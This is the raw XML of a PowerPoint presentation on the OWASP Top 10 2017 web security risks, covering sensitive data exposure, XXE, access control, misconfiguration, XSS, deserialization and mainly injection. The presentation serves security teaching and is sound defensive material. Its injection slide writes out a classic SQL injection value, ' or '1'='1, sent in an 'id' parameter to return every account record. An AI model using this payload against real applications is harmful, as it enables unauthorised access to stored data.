            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1564637" y="1874768"/>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p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="32" name="Freeform 9">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{56513DEF-2444-40AD-AE64-66E7CC6256D0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="151386" y="1798293"/>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A2:2017 Broken Authentication</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="33" name="Freeform 10">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{5F0014DB-969D-4359-A7D1-99F0AAA09C12}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1564637" y="2677749"/>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Many web applications and APIs do not properly protect sensitive data, such as financial, healthcare, and PII. Attackers may steal or modify such weakly protected data to conduct credit card fraud, identity theft, or other crimes. Sensitive data deserves extra protection such as encryption at rest or in transit, as well as special precautions when exchanged with the browser.</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="34" name="Freeform 11">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{BF109756-C917-4ECB-9826-AC54F0948B32}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="151386" y="2601274"/>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A3:2017  Sensitive Data Exposure</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="35" name="Freeform 12">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{B2A0868A-364E-4487-8030-7C4BD69D47DB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1564637" y="3480730"/>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Many older or poorly configured XML processors evaluate external entity references within XML documents. External entities can be used to disclose internal files using the file URI handler, internal SMB file shares on unpatched Windows servers, internal port scanning, remote code execution, and denial of service attacks, such as the Billion Laughs attack. </a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="36" name="Freeform 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{3635AA73-30CD-4FEB-BBAF-A9AD20490C16}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="151386" y="3404256"/>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A4:2017 XML External Entity (XXE)</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="37" name="Freeform 14">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{25F57B3B-227A-4B44-B219-FB6A81F17116}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1564637" y="4283711"/>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Restrictions on what authenticated users are allowed to do are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xmlns="" id="{0F2374FD-7476-44F3-B906-9417B048A9A2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="151386" y="4188334"/>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A5:2017 Broken Access Control</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="39" name="Freeform 16">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{AA4B2B9D-42EE-48ED-AED4-5EA8E4B64D6B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1529380" y="5086692"/>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Security misconfiguration is the most common issue in the data, which is due in part to manual or ad hoc configuration (or not configuring at all), insecure default configurations, open S3 buckets, misconfigured HTTP headers, error messages containing sensitive information, not patching or upgrading systems, frameworks, dependencies, and components in a timely fashion (or at all). </a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="40" name="Freeform 17">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{A858E023-0889-4FE9-9B01-62527B94C07F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="151386" y="5010218"/>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A6:2017 Security Misconfiguration</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="41" name="Freeform 18">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{E4E0F83D-B235-48A5-A352-7B6BBC2BAE17}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1564637" y="5889673"/>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XSS flaws occur whenever an application includes untrusted data in a new web page without proper validation or escaping, or updates an existing web page with user supplied data using a browser API that can create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xmlns="" id="{AC128063-7A66-4F34-A720-2EAB6E988467}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="151386" y="5813199"/>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A7:2017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Cross-Site Scripting (XSS)</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="43" name="Freeform 20">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{3E895283-6404-4647-9AED-A7928C930CB4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1564637" y="6692655"/>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algn="l"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Insecure deserialization flaws occur when an application receives hostile serialized objects. Insecure deserialization leads to remote code execution. Even if deserialization flaws do not result in remote code execution, serialized objects can be replayed, tampered or deleted to spoof users, conduct injection attacks, and elevate privileges. </a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="44" name="Freeform 21">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{1770D43A-73DB-44C0-AF41-71E9A314BA2B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="151386" y="6616181"/>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A8:2017 Insecure Deserialization</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="45" name="Freeform 22">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{1D3ABA2A-B6B4-4A1F-B3F6-D4C323A211D7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1564637" y="7495636"/>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xmlns="" id="{591F4221-9110-4B57-9D5B-633059706604}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="151386" y="7419162"/>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A9:2017 Using Components with Known Vulnerabilities</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="47" name="Freeform 24">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{49216BAC-D272-467A-B5B1-631A0C551A99}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1564637" y="8298617"/>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8" name="Freeform 25">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{AD39F83D-88CC-4839-86E9-886E3E768699}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="151386" y="8222143"/>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A10:2017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Insufficient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Logging &amp; Monitoring</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="705852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#1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: An application uses untrusted data in the construction of the following </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>vulnerable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> SQL call: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r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <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#2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans"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r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <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 both cases, the attacker modifies the ‘id’ parameter value in her browser to send:  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>' or '1'='1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>. For example: </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This changes the meaning of both queries to return all the records from the accounts table.  More dangerous attacks could modify data or even invoke stored procedures.</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User-supplied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directly with dynamic queries or non-parameterized calls for the interpreter without context-aware escaping.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within ORM search parameters such that the search evaluates out to include sensitive or all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directly used or concatenated, such that the SQL or command contains both structure and hostile data in dynamic queries, commands, or in stored procedures.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1270" indent="-1270">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Some of the more common injections are SQL, OS command, ORM, LDAP, and Expression Language (EL) or OGNL injection.. The concept is identical between all interpreters. Organizations can include SAST and DAST tooling into the CI/CD pipeline to alert if existing or newly checked in code has injection prior to production deployment. Manual and automated source code review is the best method of detecting if you are vulnerable to injections, closely followed by thorough DAST scans of all parameters, fields, headers, cookies, JSON, and XML data inputs.</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SQL Injection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8"/>
              </a:rPr>
              <a:t>Command Injection</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9"/>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SQL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Injection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Command Injection Defense</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1200" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:hlinkClick r:id="rId14"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId15"/>
              </a:rPr>
              <a:t>CWE-77: Command </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId15"/>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smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId16"/>
              </a:rPr>
              <a:t>CWE-89: SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId16"/>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smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId17"/>
              </a:rPr>
              <a:t>CWE-564: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId17"/>
              </a:rPr>
              <a:t>Hibernate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId17"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId17"/>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smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId18"/>
              </a:rPr>
              <a:t>CWE-917: Expression Language </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId18"/>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PortSwigger: Server-side template injection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preferred option is to use a safe API which avoids the use of the interpreter entirely or provides a parameterized interface, or migrate to use ORMs or Entity Framework. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>NB: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Positive or "whitelist" server-side input validation, but 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any residual dynamic queries, escape special characters using the specific escape syntax for that interpreter. OWASP's Java Encoder and similar libraries provide such escaping routines. NB: SQL structure such as table names, column names, and so on cannot be escaped, and thus user-supplied structure names are dangerous. This is a common issue in report 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solidFill>
            <a:srgbClr val="83276B"/>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en-US" dirty="0">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="34" name="Tabelle 33"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2187720794"/>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xmlns="" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1015200">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1400400">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20002"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1400400">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20003"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1015200">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20004"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1015200">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns=""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xmlns=""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rgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Exploitability</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="12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pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Detectability</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="10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bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Technical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1260000">
                <a:tc gridSpan="2">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Almost any source of data can be an injection vector, including users, parameters, external and internal web services, and all types of users. </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId20"/>
                        </a:rPr>
                        <a:t>Injection flaws</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> occur when an attacker can send hostile data to an interpreter. </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Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Injection flaws</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>are very prevalent, particularly in legacy code. They are often found in SQL, LDAP, XPath, or NoSQL queries; OS commands; XML parsers, SMTP Headers, expression languages, ORM queries. </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin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a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Injection flaws are easy to discover when examining code. Scanners and fuzzers can help attackers find injection flaws.</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rgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Injection can result in data loss or corruption, lack of accountability, or denial of access. Injection can sometimes lead to complete host takeover.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US">
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>The business impact depends on the protection needs of your application and data.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" dirty="0">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11/11/2009"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2.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4.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3/02/2010" val="LastModified"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag4.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="04/19/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3/02/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11758</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Letter (8,5x11 Zoll)</PresentationFormat>
  <Paragraphs>1216</Paragraphs>
  <Slides>28</Slides>
  <Notes>25</Notes>
  <HiddenSlides>2</HiddenSlides>
  <MMClips>0</MMClips>
